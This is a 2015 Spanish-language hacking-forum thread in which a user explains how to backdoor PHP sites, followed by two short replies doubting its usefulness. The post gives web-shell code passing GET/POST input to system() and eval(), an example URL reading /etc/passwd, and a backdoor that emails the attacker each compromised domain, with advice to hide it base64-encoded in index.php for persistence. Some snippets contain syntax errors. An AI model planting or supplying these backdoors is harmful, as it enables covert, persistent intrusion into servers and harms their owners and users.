elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Trabajando con las ramas de git (tercera parte)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  Backdooring con PHP.
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Backdooring con PHP.  (Leído 2,200 veces)
Payasako

Desconectado Desconectado

Mensajes: 29


<rise> {..} </die>


Ver Perfil
Backdooring con PHP.
« en: 14 Junio 2015, 12:40 pm »

Hola internautas, en este post hablaré sobre técnicas para tener un archivo ya sea .PHP ó .HTML a nuestro control. No me hago responsable sobre el uso que le den a este post. Solo lo hago por cuestiones educativas y éticas.

Para el que no sepa que es un Backdoor, cito a mi amiga la Wikipedia.
Citar
una puerta trasera (o en inglés backdoor), en un sistema informático es una secuencia especial dentro del código de programación, mediante la cual se pueden evitar los sistemas de seguridad del algoritmo (autentificación) para acceder al sistema.

Temario de funciones
1-System()
2-Variable Global $_SERVER[]
2.1- $_SERVER['REMOTE_ADDR']
2.2-$_SERVER['PHP_SELF']
2.3-$_SERVER['SERVER_NAME']
3-mail()
4-eval()

System()
No dudo que ya conozcas está función ya que es la más conocida para estos temas.

Para poder usarla solo debemos declarar:
Citar
Código
  1. <?php
  2. system('comando');
  3. ?>
¿Y si se nos ocurre usar $_GET o $_POST para poder ejecutar el comando que queramos?
Citar
Código
  1. <?php
  2. $var = @system($_GET['ejec']);
  3. ?>

Podriamos entrar desde:
Citar
url.com/archivoinfectado.php?ejec=comando

un ejemplo así:
Citar
url.com/archivoinfectado.php?ejec=cat /etc/passwd
y nos mostraría el etc/passwd o podemos poner con cualquier comando, depende el servidor
dependeran los comandos, es decir si tiene linux son comandos linux y si tiene windows pues son
comandos windows, :genius:

Si no están 100% familiarizados con linux les dejo unos comandos que podrian servirles:
Mover un archivo: mv archivo /carpeta/
Renombrar un archivo: mv archivo archivorenombrado
Crear un archivo: touch archivo
Descargar archivos: wget url.com/lol.txt (Se descargará un archivo lol.txt)
Eliminar un archivo: rm archivo
Copiar un archivo: cp archivo archivocopiado

Variable global $_SERVER
$_SERVER['REMOTE_ADDR'] – Muestra la ip de el usuario que está abriendo el script

Ejemplo:
Citar
Código
  1. <?php
  2. echo 'tu IP es'.$_SERVER['REMOTE_ADDR'];
  3. ?>

Mostrará la IP de quien lo abra.
$_SERVER['PHP_SELF']- Muestra la ruta en el que se está ejecutando el script.

Ejemplo:
Citar
Código
  1. <?php
  2. echo 'Este archivo esta en'.$_SERVER['PHP_SELF'];
  3. ?>

Mostrará la ruta de el script, es decir si estamos en web.com/hola/lol.php te mostrara /hola/lol.php
$_SERVER['SERVER_NAME'] – Muestra el dominio en el que se está ejecutando el script.

Ejemplo:
Citar
Código
  1. <?php
  2. echo 'Estamos en el dominio '.$_SERVER['SERVER_NAME'];
  3. ?>

Te mostrará en la pantalla Estamos en el dominio http://web.com


Mail()
Está función sirve para enviar un mail.

Modo de uso:
mail('Para', 'Asunto', 'Contenido')
NOTA: Esto se puede almacenar en variables pero como he dicho no estoy enseñando a programar PHP.

Entonces si yo pongo en un script:
Citar
Código
  1. <?php
  2. mail('elhacker@outlook.es', 'Hola', 'Hola mucho gusto soy'.$_SERVER['REMOTE_ADDR);
  3. ?>
Al momento de que alguen entre me enviara un email con el asunto Hola y con el contenido “Hola
mucho gusto soy y una IP”.

Bueno ya lo que sigue es a su imaginación, lo que deseen hacer.

eval()
Bien, ahora les explicaré está función. Eval es parecida a system con la diferencia en que system ejecuta comandos en el sistema y eval ejecuta código PHP.

Un claro ejemplo de uso.
Citar
Código
  1. <?php
  2. $var = eval(echo 'hola elhacker';);
  3. ?>
Si lo ejecutamos veremos que nos mostrará: hola elhacker. Al igual que system() la podemos usar con $_GET ó $_POST de la misma forma.

Ejemplo:
Citar
Código
  1. <?php
  2. $var eval($_GET['ejec']);
  3. ?>

lo usamos de está forma:
Citar
url.com/archivoinfectado.php?ejec=echo 'hola';
y miren que claramente nos ejecutará hola.
Bueno si no están muy familiarizados con PHP está ultima función no les ayudará tanto (y si ponen el code de una shell).

Creando nuestros backdoors.
Un backdoor que ejecute comandos en un sistema pero que nos avise por email cuando alguiien haya visitado este script.
Citar
Código
  1. <?php
  2. $var = system($_POST['ejec');
  3. $domain = $_SERVER['SERVER_NAME'];
  4. $ruta = $_SERVER['PHP_SELF'];
  5. mail('elhacker@gmail.com', 'Nuevo dominio infectado', $domain.$ruta);
  6. ?>

Son 4 lineas que podemos incluir en cualquier script, si ponemos estas 4 lineas dentro de una shell y despues ciframos todo en base64... ¿Quíen se dará cuenta? O también podemos incluir estas lineas digamos en el archivo index.php, asi si nos borran una shell seguimos teniendo acceso al servidor.
Citar
Código
  1. <?php
  2. $var = eval($_POST['ejec');
  3. $domain = $_SERVER['SERVER_NAME'];
  4. $ruta = $_SERVER['PHP_SELF'];
  5. mail('elhacker@gmail.com', 'Nuevo dominio infectado', $domain.$ruta);
  6. ?>

Bueno hay muchas, muchas formas de darle provecho a estas funciones, Yo solo explique dos.
Usen la imaginación.

Saludos, Payasako.
« Última modificación: 14 Junio 2015, 12:50 pm por Payasako » En línea



Three things never return back. A bullet fired, a word that and a missed opportunity.
тαптяα


Desconectado Desconectado

Mensajes: 1.151


Sic utere tuo ut alienum non laeda


Ver Perfil WWW
Re: Backdooring con PHP.
« Respuesta #1 en: 14 Junio 2015, 13:09 pm »

Pero tengo una duda, como esperas ejecutar esos códigos ..

necesitas acceso al sistema, para editar algun PHP, o es que ya está vulnerable de antes?
En línea

3n31ch


Desconectado Desconectado

Mensajes: 445


Grandes conocimientos engendran grandes dudas


Ver Perfil
Re: Backdooring con PHP.
« Respuesta #2 en: 9 Julio 2015, 18:00 pm »

Pero tengo una duda, como esperas ejecutar esos códigos ..

necesitas acceso al sistema, para editar algún PHP, o es que ya está vulnerable de antes?

+1.

No entiendo, si tienes acceso al sistema, realmente necesitas de estas instrucciones PHP?
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines